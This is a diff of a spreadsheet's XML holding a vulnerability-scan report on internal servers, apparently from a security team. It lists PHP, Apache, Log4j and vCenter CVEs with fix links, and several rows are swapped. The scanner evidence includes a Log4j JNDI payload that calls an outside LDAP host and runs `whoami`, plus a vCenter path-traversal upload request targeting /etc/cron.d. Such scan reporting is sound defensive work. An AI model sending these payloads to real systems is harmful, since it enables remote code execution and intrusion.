-          <t>10.128.165.151</t>
-        </is>
-      </c>
-      <c r="N141" t="inlineStr">
-        <is>
-          <t>服务器</t>
-        </is>
-      </c>
-      <c r="O141" t="inlineStr">
-        <is>
-          <t>MSS研发组</t>
-        </is>
-      </c>
-      <c r="P141" t="inlineStr"/>
-      <c r="Q141" t="inlineStr"/>
-      <c r="R141" t="inlineStr">
-        <is>
-          <t>普通资产</t>
-        </is>
-      </c>
-      <c r="S141" t="inlineStr">
-        <is>
-          <t>台账资产</t>
-        </is>
-      </c>
-      <c r="T141" t="inlineStr">
-        <is>
-          <t>未托管</t>
-        </is>
-      </c>
-      <c r="U141" t="inlineStr">
-        <is>
-          <t>8090</t>
-        </is>
-      </c>
-      <c r="V141" t="inlineStr"/>
-      <c r="W141" t="inlineStr">
-        <is>
-          <t>未知</t>
-        </is>
-      </c>
-      <c r="X141" t="inlineStr">
-        <is>
-          <t>组件及版本: PHP:5.6.13</t>
-        </is>
-      </c>
-      <c r="Y141" t="inlineStr">
-        <is>
-          <t>待处置</t>
-        </is>
-      </c>
-      <c r="Z141" t="inlineStr">
-        <is>
-          <t>内网</t>
-        </is>
-      </c>
-    </row>
-    <row r="142">
-      <c r="A142" t="inlineStr">
-        <is>
-          <t>Oniguruma PHP 缓冲区错误漏洞(CVE-2017-9225)</t>
-        </is>
-      </c>
-      <c r="B142" t="inlineStr">
-        <is>
-          <t>尽快修复</t>
-        </is>
-      </c>
-      <c r="C142" t="inlineStr">
-        <is>
-          <t>严重</t>
-        </is>
-      </c>
-      <c r="D142" t="inlineStr">
-        <is>
-          <t>Buffer Overflow</t>
-        </is>
-      </c>
-      <c r="E142" t="inlineStr">
-        <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接:https://github.com/kkos/oniguruma/commit/166a6c3999bf06b4de0ab4ce6b088a468cc4029f</t>
-        </is>
-      </c>
-      <c r="F142" t="inlineStr">
-        <is>
-          <t>Oniguruma是一款开源的正则表达式库。 Oniguruma 6.2.0存在缓冲区错误漏洞。该漏洞源于在 Ruby 中的 Oniguruma-mod 到 2.4.1 和 PHP 中的 mbstring 到 7.1.5 中使用。 在正则表达式编译期间，在 next_state_val() 中发生堆越界写入或读取。 大于 0xff 的八进制数在 fetch_token() 和 fetch_token_in_cc() 中无法正确处理。 包含 '700' 形式的八进制数的格式错误的正则表达式将在 next_state_val() 中生成大于 0xff 的无效代码点值，从而导致越界写入内存损坏。攻击者可利用该漏洞造成拒绝服务（栈越边界写入）。</t>
-        </is>
-      </c>
-      <c r="G142" t="inlineStr">
-        <is>
-          <t>Vuln with Attack Code Disclosure</t>
-        </is>
-      </c>
-      <c r="H142" t="inlineStr">
-        <is>
-          <t>云镜</t>
-        </is>
-      </c>
-      <c r="I142" t="inlineStr">
-        <is>
-          <t>版本比对</t>
-        </is>
-      </c>
-      <c r="J142" t="inlineStr">
-        <is>
-          <t>CVE-2017-9225</t>
         </is>
       </c>
       <c r="K142" t="inlineStr">
@@ -17632,7 +17632,7 @@
     <row r="143">
       <c r="A143" t="inlineStr">
         <is>
-          <t>PHP 安全漏洞(CVE-2015-8383)</t>
+          <t>PHP 安全漏洞(CVE-2015-8386)</t>
         </is>
       </c>
       <c r="B143" t="inlineStr">
@@ -17647,17 +17647,17 @@
       </c>
       <c r="D143" t="inlineStr">
         <is>
-          <t>Other</t>
+          <t>Buffer Overflow</t>
         </is>
       </c>
       <c r="E143" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/kkos/oniguruma/commit/3b63d12038c8d8fc278e81c942fa9bec7c704c8b</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://vcs.pcre.org/pcre/code/trunk/ChangeLog?view=markup</t>
         </is>
       </c>
       <c r="F143" t="inlineStr">
         <is>
-          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本中存在安全漏洞，该漏洞源于程序没有正确处理重复的条件组。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（缓冲区溢出）。</t>
+          <t>8.38之前的PCRE处理了后置断言和相互​​递归子模式的交互，这使远程攻击者可以通过精心制作的正则表达式导致拒绝服务（缓冲区溢出）或可能产生未指定的其他影响，如Konqueror遇到的JavaScript RegExp对象所证明的那样</t>
         </is>
       </c>
       <c r="G143" t="inlineStr">
@@ -17677,7 +17677,7 @@
       </c>
       <c r="J143" t="inlineStr">
         <is>
-          <t>CVE-2015-8383</t>
+          <t>CVE-2015-8386</t>
         </is>
       </c>
       <c r="K143" t="inlineStr">
@@ -17752,7 +17752,7 @@
     <row r="144">
       <c r="A144" t="inlineStr">
         <is>
-          <t>PHP 安全漏洞(CVE-2015-8386)</t>
+          <t>PHP 安全漏洞(CVE-2015-8383)</t>
         </is>
       </c>
       <c r="B144" t="inlineStr">
@@ -17767,17 +17767,17 @@
       </c>
       <c r="D144" t="inlineStr">
         <is>
-          <t>Buffer Overflow</t>
+          <t>Other</t>
         </is>
       </c>
       <c r="E144" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://vcs.pcre.org/pcre/code/trunk/ChangeLog?view=markup</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/kkos/oniguruma/commit/3b63d12038c8d8fc278e81c942fa9bec7c704c8b</t>
         </is>
       </c>
       <c r="F144" t="inlineStr">
         <is>
-          <t>8.38之前的PCRE处理了后置断言和相互​​递归子模式的交互，这使远程攻击者可以通过精心制作的正则表达式导致拒绝服务（缓冲区溢出）或可能产生未指定的其他影响，如Konqueror遇到的JavaScript RegExp对象所证明的那样</t>
+          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本中存在安全漏洞，该漏洞源于程序没有正确处理重复的条件组。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（缓冲区溢出）。</t>
         </is>
       </c>
       <c r="G144" t="inlineStr">
@@ -17797,7 +17797,7 @@
       </c>
       <c r="J144" t="inlineStr">
         <is>
-          <t>CVE-2015-8386</t>
+          <t>CVE-2015-8383</t>
         </is>
       </c>
       <c r="K144" t="inlineStr">
@@ -18713,7 +18713,7 @@
     <row r="152">
       <c r="A152" t="inlineStr">
         <is>
-          <t>PHP 缓冲区错误漏洞(CVE-2017-12933)</t>
+          <t>PHP GD Graphics Library 缓冲区错误漏洞(CVE-2016-8670)</t>
         </is>
       </c>
       <c r="B152" t="inlineStr">
@@ -18733,13 +18733,13 @@
       </c>
       <c r="E152" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
-http://php.net/ChangeLog-5.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+http://www.php.net/ChangeLog-7.php</t>
         </is>
       </c>
       <c r="F152" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP中的ext/standard/var_unserializer.re的‘finish_nested_data’函数存在缓冲区溢出漏洞。攻击者可利用该漏洞执行任意代码或造成拒绝服务。以下版本受到影响：PHP 5.6.31之前的版本，7.0.21之前的7.0.x版本，7.1.7之前的7.1.x版本。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。GD Graphics Library（又名libgd或libgd2）是美国软件开发者Thomas Boutell所研发的一个开源的用于动态创建图像的库，它支持创建图表、图形和缩略图等。PHP 5.6.28之前的版本和7.0.13之前的的7.x版本的GD Graphics Library 2.2.3及之前的版本中的gd_io_dp.c文件的‘dynamicGetbuf’函数存在整数符号错误漏洞。远程攻击者可借助特制的imagecreatefromstring调用利用该漏洞造成拒绝服务（基于栈的缓冲区溢出）。</t>
         </is>
       </c>
       <c r="G152" t="inlineStr">
@@ -18759,7 +18759,7 @@
       </c>
       <c r="J152" t="inlineStr">
         <is>
-          <t>CVE-2017-12933</t>
+          <t>CVE-2016-8670</t>
         </is>
       </c>
       <c r="K152" t="inlineStr">
@@ -18834,7 +18834,7 @@
     <row r="153">
       <c r="A153" t="inlineStr">
         <is>
-          <t>PHP GD Graphics Library 缓冲区错误漏洞(CVE-2016-8670)</t>
+          <t>PHP 缓冲区错误漏洞(CVE-2017-12933)</t>
         </is>
       </c>
       <c r="B153" t="inlineStr">
@@ -18854,13 +18854,13 @@
       </c>
       <c r="E153" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-http://www.php.net/ChangeLog-7.php</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
+http://php.net/ChangeLog-5.php</t>
         </is>
       </c>
       <c r="F153" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。GD Graphics Library（又名libgd或libgd2）是美国软件开发者Thomas Boutell所研发的一个开源的用于动态创建图像的库，它支持创建图表、图形和缩略图等。PHP 5.6.28之前的版本和7.0.13之前的的7.x版本的GD Graphics Library 2.2.3及之前的版本中的gd_io_dp.c文件的‘dynamicGetbuf’函数存在整数符号错误漏洞。远程攻击者可借助特制的imagecreatefromstring调用利用该漏洞造成拒绝服务（基于栈的缓冲区溢出）。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP中的ext/standard/var_unserializer.re的‘finish_nested_data’函数存在缓冲区溢出漏洞。攻击者可利用该漏洞执行任意代码或造成拒绝服务。以下版本受到影响：PHP 5.6.31之前的版本，7.0.21之前的7.0.x版本，7.1.7之前的7.1.x版本。</t>
         </is>
       </c>
       <c r="G153" t="inlineStr">
@@ -18880,7 +18880,7 @@
       </c>
       <c r="J153" t="inlineStr">
         <is>
-          <t>CVE-2016-8670</t>
+          <t>CVE-2017-12933</t>
         </is>
       </c>
       <c r="K153" t="inlineStr">
@@ -20765,7 +20765,7 @@
     <row r="169">
       <c r="A169" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 缓冲区错误漏洞(CVE-2021-39275)</t>
+          <t>Apache HTTP Server 服务端请求伪造漏洞(CVE-2021-40438)</t>
         </is>
       </c>
       <c r="B169" t="inlineStr">
@@ -20780,22 +20780,22 @@
       </c>
       <c r="D169" t="inlineStr">
         <is>
-          <t>Buffer Overflow</t>
+          <t>Code Execution</t>
         </is>
       </c>
       <c r="E169" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://httpd.apache.org/security/vulnerabilities_24.html</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://access.redhat.com/security/cve/cve-2021-40438</t>
         </is>
       </c>
       <c r="F169" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 2.4.48及之前版本存在缓冲区错误漏洞，该漏洞源于当给定恶意输入时，ap_escape_quotes()可能会写入缓冲区之外的内容。</t>
+          <t>Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。Apache HTTP Server存在代码问题漏洞，该漏洞是由于系统对用户的输入没有进行严格的过滤导致，攻击者可以构造恶意数据对目标服务器进行SSRF攻击。该漏洞可做为攻击目标服务器内网的跳板，以此对服务器所在内网进行端口扫描、攻击运行在内网的应用程序、下载内网资源等。</t>
         </is>
       </c>
       <c r="G169" t="inlineStr">
         <is>
-          <t>Vuln with Attack Code Disclosure</t>
+          <t>Active Vuln、Vuln with Attack Code Disclosure、Highly Exploitable Vuln</t>
         </is>
       </c>
       <c r="H169" t="inlineStr">
@@ -20810,7 +20810,7 @@
       </c>
       <c r="J169" t="inlineStr">
         <is>
-          <t>CVE-2021-39275</t>
+          <t>CVE-2021-40438</t>
         </is>
       </c>
       <c r="K169" t="inlineStr">
@@ -21005,7 +21005,7 @@
     <row r="171">
       <c r="A171" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 服务端请求伪造漏洞(CVE-2021-40438)</t>
+          <t>Apache HTTP Server 缓冲区错误漏洞(CVE-2021-39275)</t>
         </is>
       </c>
       <c r="B171" t="inlineStr">
@@ -21020,22 +21020,22 @@
       </c>
       <c r="D171" t="inlineStr">
         <is>
-          <t>Code Execution</t>
+          <t>Buffer Overflow</t>
         </is>
       </c>
       <c r="E171" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://access.redhat.com/security/cve/cve-2021-40438</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://httpd.apache.org/security/vulnerabilities_24.html</t>
         </is>
       </c>
       <c r="F171" t="inlineStr">
         <is>
-          <t>Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。Apache HTTP Server存在代码问题漏洞，该漏洞是由于系统对用户的输入没有进行严格的过滤导致，攻击者可以构造恶意数据对目标服务器进行SSRF攻击。该漏洞可做为攻击目标服务器内网的跳板，以此对服务器所在内网进行端口扫描、攻击运行在内网的应用程序、下载内网资源等。</t>
+          <t>Apache HTTP Server 2.4.48及之前版本存在缓冲区错误漏洞，该漏洞源于当给定恶意输入时，ap_escape_quotes()可能会写入缓冲区之外的内容。</t>
         </is>
       </c>
       <c r="G171" t="inlineStr">
         <is>
-          <t>Active Vuln、Vuln with Attack Code Disclosure、Highly Exploitable Vuln</t>
+          <t>Vuln with Attack Code Disclosure</t>
         </is>
       </c>
       <c r="H171" t="inlineStr">
@@ -21050,7 +21050,7 @@
       </c>
       <c r="J171" t="inlineStr">
         <is>
-          <t>CVE-2021-40438</t>
+          <t>CVE-2021-39275</t>
         </is>
       </c>
       <c r="K171" t="inlineStr">
@@ -24625,25 +24625,155 @@
     <row r="199">
       <c r="A199" t="inlineStr">
         <is>
+          <t>Apache Log4j2远程代码执行漏洞(CVE-2021-44228)</t>
+        </is>
+      </c>
+      <c r="B199" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C199" t="inlineStr">
+        <is>
+          <t>严重</t>
+        </is>
+      </c>
+      <c r="D199" t="inlineStr">
+        <is>
+          <t>Code Execution</t>
+        </is>
+      </c>
+      <c r="E199" t="inlineStr">
+        <is>
+          <t>1.Java 6 将 log4j 升级到 2.3.1 版本，Java 7 将 log4j 升级到 2.12.3 版本，Java 8 或更高版本将 log4j 升级到 2.17.0 版本，下载地址：https://logging.apache.org/log4j/2.x/download.html
+2.若暂时无法升级，删除jar包中漏洞相关的JndiLookup.class文件： zip -q -d log4j-core-xxx.jar org/apache/logging/log4j/core/lookup/JndiLookup.class</t>
+        </is>
+      </c>
+      <c r="F199" t="inlineStr">
+        <is>
+          <t>Apache Log4j是一个功能强大的日志组件，提供方便的日志记录。
+Apache Log4j2存在远程代码执行漏洞，由于Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。</t>
+        </is>
+      </c>
+      <c r="G199" t="inlineStr">
+        <is>
+          <t>Hot Exploit、Ransomware Exploit、Virus Exploit、Active Vuln、APT Exploit、Vuln with Attack Code Disclosure、Highly Exploitable Vuln</t>
+        </is>
+      </c>
+      <c r="H199" t="inlineStr">
+        <is>
+          <t>STA</t>
+        </is>
+      </c>
+      <c r="I199" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J199" t="inlineStr">
+        <is>
+          <t>CVE-2021-44228</t>
+        </is>
+      </c>
+      <c r="K199" t="inlineStr">
+        <is>
+          <t>2026-06-08 13:50:35</t>
+        </is>
+      </c>
+      <c r="L199" t="inlineStr">
+        <is>
+          <t>2026-06-08 13:17:38</t>
+        </is>
+      </c>
+      <c r="M199" t="inlineStr">
+        <is>
+          <t>192.168.100.200</t>
+        </is>
+      </c>
+      <c r="N199" t="inlineStr">
+        <is>
+          <t>其他</t>
+        </is>
+      </c>
+      <c r="O199" t="inlineStr">
+        <is>
+          <t>MSS研发组</t>
+        </is>
+      </c>
+      <c r="P199" t="inlineStr"/>
+      <c r="Q199" t="inlineStr"/>
+      <c r="R199" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S199" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T199" t="inlineStr">
+        <is>
+          <t>未托管</t>
+        </is>
+      </c>
+      <c r="U199" t="inlineStr">
+        <is>
+          <t>6379</t>
+        </is>
+      </c>
+      <c r="V199" t="inlineStr">
+        <is>
+          <t>192.168.100.200:6379/MavenWeb/get.jsp</t>
+        </is>
+      </c>
+      <c r="W199" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="X199" t="inlineStr">
+        <is>
+          <t>页面url: 192.168.100.200:6379/MavenWeb/get.jsp
+请求体: POST /MavenWeb/get.jsp HTTP/1.1\r\nHost: 192.168.100.200:6379\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nConnection: keep-alive\r\ncmd: whoami\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 61\r\n\r\n
+data=${jndi:ldap://11.11.12.101:1234/TomcatBypass/TomcatEcho}
+响应体: HTTP/1.1 200\r\nSet-Cookie: JSESSIONID=138ACFF865B192BF41130F4C60A3D32F; Path=/MavenWeb; HttpOnly\r\nContent-Type: text/html;charset=UTF-8\r\nTransfer-Encoding: chunked\r\nDate: Mon, 08 Jun 2026 17:50:35 GMT\r\nKeep-Alive: timeout=20\r\nConnection: keep-alive\r\n\r\n
+Dc-win12%5Cadministrator\r\n\r\n${jndi:ldap://11.11.12.101:1234/TomcatBypass/TomcatEcho} \r\n\r\n&lt;html&gt;\r\n&lt;head&gt;\r\n&lt;title&gt;Title&lt;/title&gt;\r\n&lt;/head&gt;\r\n&lt;body&gt;\r\n\r\n&lt;/body&gt;\r\n&lt;/html&gt;</t>
+        </is>
+      </c>
+      <c r="Y199" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Z199" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="200">
+      <c r="A200" t="inlineStr">
+        <is>
           <t>VMware vCenter Server 文件上传漏洞(CVE-2021-22005)</t>
         </is>
       </c>
-      <c r="B199" t="inlineStr">
+      <c r="B200" t="inlineStr">
         <is>
           <t>尽快修复</t>
         </is>
       </c>
-      <c r="C199" t="inlineStr">
+      <c r="C200" t="inlineStr">
         <is>
           <t>严重</t>
         </is>
       </c>
-      <c r="D199" t="inlineStr">
+      <c r="D200" t="inlineStr">
         <is>
           <t>Arbitrary File Upload</t>
         </is>
       </c>
-      <c r="E199" t="inlineStr">
+      <c r="E200" t="inlineStr">
         <is>
           <t>安全版本：
 vCenter Server 6.7 U3o
@@ -24652,90 +24782,90 @@
 官方已发布安全补丁，链接如下：https://www.vmware.com/security/advisories/VMSA-2021-0020.html</t>
         </is>
       </c>
-      <c r="F199" t="inlineStr">
+      <c r="F200" t="inlineStr">
         <is>
           <t>VMware  vCenter Server是美国威睿（VMware）公司的一套服务器和虚拟化管理软件。
 VMware  vCenter Server存在文件上传漏洞，攻击者可通过访问开放web端口的服务器向vCenter Server发送上传特定的文件从而在Center服务器上执行代码。</t>
         </is>
       </c>
-      <c r="G199" t="inlineStr">
+      <c r="G200" t="inlineStr">
         <is>
           <t>Vuln with Attack Code Disclosure、Ransomware Exploit、Virus Exploit、Highly Exploitable Vuln</t>
         </is>
       </c>
-      <c r="H199" t="inlineStr">
+      <c r="H200" t="inlineStr">
         <is>
           <t>STA</t>
         </is>
       </c>
-      <c r="I199" t="inlineStr">
+      <c r="I200" t="inlineStr">
         <is>
           <t>原理扫描</t>
         </is>
       </c>
-      <c r="J199" t="inlineStr">
+      <c r="J200" t="inlineStr">
         <is>
           <t>CVE-2021-22005</t>
         </is>
       </c>
-      <c r="K199" t="inlineStr">
+      <c r="K200" t="inlineStr">
         <is>
           <t>2026-06-08 13:50:35</t>
         </is>
       </c>
-      <c r="L199" t="inlineStr">
+      <c r="L200" t="inlineStr">
         <is>
           <t>2026-06-08 13:17:38</t>
         </is>
       </c>
-      <c r="M199" t="inlineStr">
+      <c r="M200" t="inlineStr">
         <is>
           <t>192.168.26.44</t>
         </is>
       </c>
-      <c r="N199" t="inlineStr">
+      <c r="N200" t="inlineStr">
         <is>
           <t>其他</t>
         </is>
       </c>
-      <c r="O199" t="inlineStr">
+      <c r="O200" t="inlineStr">
         <is>
           <t>MSS研发组</t>
         </is>
       </c>
-      <c r="P199" t="inlineStr"/>
-      <c r="Q199" t="inlineStr"/>
-      <c r="R199" t="inlineStr">
+      <c r="P200" t="inlineStr"/>
+      <c r="Q200" t="inlineStr"/>
+      <c r="R200" t="inlineStr">
         <is>
           <t>普通资产</t>
         </is>
       </c>
-      <c r="S199" t="inlineStr">
+      <c r="S200" t="inlineStr">
         <is>
           <t>台账资产</t>
         </is>
       </c>
-      <c r="T199" t="inlineStr">
+      <c r="T200" t="inlineStr">
         <is>
           <t>未托管</t>
         </is>
       </c>
-      <c r="U199" t="inlineStr">
+      <c r="U200" t="inlineStr">
         <is>
           <t>8080</t>
         </is>
       </c>
-      <c r="V199" t="inlineStr">
+      <c r="V200" t="inlineStr">
         <is>
           <t>172.16.165.153:2222/analytics/telemetry/ph/api/hyper/send?_c=&amp;_i=/../../../../../../../../etc/cron.d/xshell</t>
         </is>
       </c>
-      <c r="W199" t="inlineStr">
+      <c r="W200" t="inlineStr">
         <is>
           <t>未知</t>
         </is>
       </c>
-      <c r="X199" t="inlineStr">
+      <c r="X200" t="inlineStr">
         <is>
           <t xml:space="preserve">页面url: 172.16.165.153:2222/analytics/telemetry/ph/api/hyper/send?_c=&amp;_i=/../../../../../../../../etc/cron.d/xshell
 请求体: POST /analytics/telemetry/ph/api/hyper/send?_c=&amp;_i=/../../../../../../../../etc/cron.d/xshell HTTP/1.1
@@ -24766,136 +24896,6 @@
 </t>
         </is>
       </c>
-      <c r="Y199" t="inlineStr">
-        <is>
-          <t>待处置</t>
-        </is>
-      </c>
-      <c r="Z199" t="inlineStr">
-        <is>
-          <t>内网</t>
-        </is>
-      </c>
-    </row>
-    <row r="200">
-      <c r="A200" t="inlineStr">
-        <is>
-          <t>Apache Log4j2远程代码执行漏洞(CVE-2021-44228)</t>
-        </is>
-      </c>
-      <c r="B200" t="inlineStr">
-        <is>
-          <t>尽快修复</t>
-        </is>
-      </c>
-      <c r="C200" t="inlineStr">
-        <is>
-          <t>严重</t>
-        </is>
-      </c>
-      <c r="D200" t="inlineStr">
-        <is>
-          <t>Code Execution</t>
-        </is>
-      </c>
-      <c r="E200" t="inlineStr">
-        <is>
-          <t>1.Java 6 将 log4j 升级到 2.3.1 版本，Java 7 将 log4j 升级到 2.12.3 版本，Java 8 或更高版本将 log4j 升级到 2.17.0 版本，下载地址：https://logging.apache.org/log4j/2.x/download.html
-2.若暂时无法升级，删除jar包中漏洞相关的JndiLookup.class文件： zip -q -d log4j-core-xxx.jar org/apache/logging/log4j/core/lookup/JndiLookup.class</t>
-        </is>
-      </c>
-      <c r="F200" t="inlineStr">
-        <is>
-          <t>Apache Log4j是一个功能强大的日志组件，提供方便的日志记录。
-Apache Log4j2存在远程代码执行漏洞，由于Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。</t>
-        </is>
-      </c>
-      <c r="G200" t="inlineStr">
-        <is>
-          <t>Hot Exploit、Ransomware Exploit、Virus Exploit、Active Vuln、APT Exploit、Vuln with Attack Code Disclosure、Highly Exploitable Vuln</t>
-        </is>
-      </c>
-      <c r="H200" t="inlineStr">
-        <is>
-          <t>STA</t>
-        </is>
-      </c>
-      <c r="I200" t="inlineStr">
-        <is>
-          <t>原理扫描</t>
-        </is>
-      </c>
-      <c r="J200" t="inlineStr">
-        <is>
-          <t>CVE-2021-44228</t>
-        </is>
-      </c>
-      <c r="K200" t="inlineStr">
-        <is>
-          <t>2026-06-08 13:50:35</t>
-        </is>
-      </c>
-      <c r="L200" t="inlineStr">
-        <is>
-          <t>2026-06-08 13:17:38</t>
-        </is>
-      </c>
-      <c r="M200" t="inlineStr">
-        <is>
-          <t>192.168.100.200</t>
-        </is>
-      </c>
-      <c r="N200" t="inlineStr">
-        <is>
-          <t>其他</t>
-        </is>
-      </c>
-      <c r="O200" t="inlineStr">
-        <is>
-          <t>MSS研发组</t>
-        </is>
-      </c>
-      <c r="P200" t="inlineStr"/>
-      <c r="Q200" t="inlineStr"/>
-      <c r="R200" t="inlineStr">
-        <is>
-          <t>普通资产</t>
-        </is>
-      </c>
-      <c r="S200" t="inlineStr">
-        <is>
-          <t>台账资产</t>
-        </is>
-      </c>
-      <c r="T200" t="inlineStr">
-        <is>
-          <t>未托管</t>
-        </is>
-      </c>
-      <c r="U200" t="inlineStr">
-        <is>
-          <t>6379</t>
-        </is>
-      </c>
-      <c r="V200" t="inlineStr">
-        <is>
-          <t>192.168.100.200:6379/MavenWeb/get.jsp</t>
-        </is>
-      </c>
-      <c r="W200" t="inlineStr">
-        <is>
-          <t>未知</t>
-        </is>
-      </c>
-      <c r="X200" t="inlineStr">
-        <is>
-          <t>页面url: 192.168.100.200:6379/MavenWeb/get.jsp
-请求体: POST /MavenWeb/get.jsp HTTP/1.1\r\nHost: 192.168.100.200:6379\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nConnection: keep-alive\r\ncmd: whoami\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 61\r\n\r\n
-data=${jndi:ldap://11.11.12.101:1234/TomcatBypass/TomcatEcho}
-响应体: HTTP/1.1 200\r\nSet-Cookie: JSESSIONID=138ACFF865B192BF41130F4C60A3D32F; Path=/MavenWeb; HttpOnly\r\nContent-Type: text/html;charset=UTF-8\r\nTransfer-Encoding: chunked\r\nDate: Mon, 08 Jun 2026 17:50:35 GMT\r\nKeep-Alive: timeout=20\r\nConnection: keep-alive\r\n\r\n
-Dc-win12%5Cadministrator\r\n\r\n${jndi:ldap://11.11.12.101:1234/TomcatBypass/TomcatEcho} \r\n\r\n&lt;html&gt;\r\n&lt;head&gt;\r\n&lt;title&gt;Title&lt;/title&gt;\r\n&lt;/head&gt;\r\n&lt;body&gt;\r\n\r\n&lt;/body&gt;\r\n&lt;/html&gt;</t>
-        </is>
-      </c>
       <c r="Y200" t="inlineStr">
         <is>
           <t>待处置</t>
@@ -25313,7 +25313,7 @@
     <row r="204">
       <c r="A204" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 请求走私漏洞(CVE-2022-36760)</t>
+          <t>Apache HTTP Server 输入验证错误漏洞（CVE-2022-22721）</t>
         </is>
       </c>
       <c r="B204" t="inlineStr">
@@ -25328,17 +25328,18 @@
       </c>
       <c r="D204" t="inlineStr">
         <is>
-          <t>Protocol Bypass</t>
+          <t>Improper Input Validation</t>
         </is>
       </c>
       <c r="E204" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://httpd.apache.org/security/vulnerabilities_24.html</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://httpd.apache.org/security/vulnerabilities_24.html</t>
         </is>
       </c>
       <c r="F204" t="inlineStr">
         <is>
-          <t>Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。Apache HTTP Server 2.4版本至2.4.54之前版本存在环境问题漏洞，该漏洞源于从mod_proxy_ajp函数中发现包含HTTP请求走私漏洞。</t>
+          <t xml:space="preserve">Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。Apache HTTP Server 2.4.52 及更早版本存在输入验证错误漏洞，该漏洞源于如果在 32 位系统上将 LimitXMLRequestBody 设置为允许大于 350MB（默认为 1M）的请求正文，则会发生整数溢出，随后会导致越界写入。
+</t>
         </is>
       </c>
       <c r="G204" t="inlineStr">
@@ -25358,7 +25359,7 @@
       </c>
       <c r="J204" t="inlineStr">
         <is>
-          <t>CVE-2022-36760</t>
+          <t>CVE-2022-22721</t>
         </is>
       </c>
       <c r="K204" t="inlineStr">
@@ -25433,7 +25434,7 @@
     <row r="205">
       <c r="A205" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 输入验证错误漏洞（CVE-2022-22721）</t>
+          <t>Apache HTTP Server 请求走私漏洞(CVE-2022-36760)</t>
         </is>
       </c>
       <c r="B205" t="inlineStr">
@@ -25448,18 +25449,17 @@
       </c>
       <c r="D205" t="inlineStr">
         <is>
-          <t>Improper Input Validation</t>
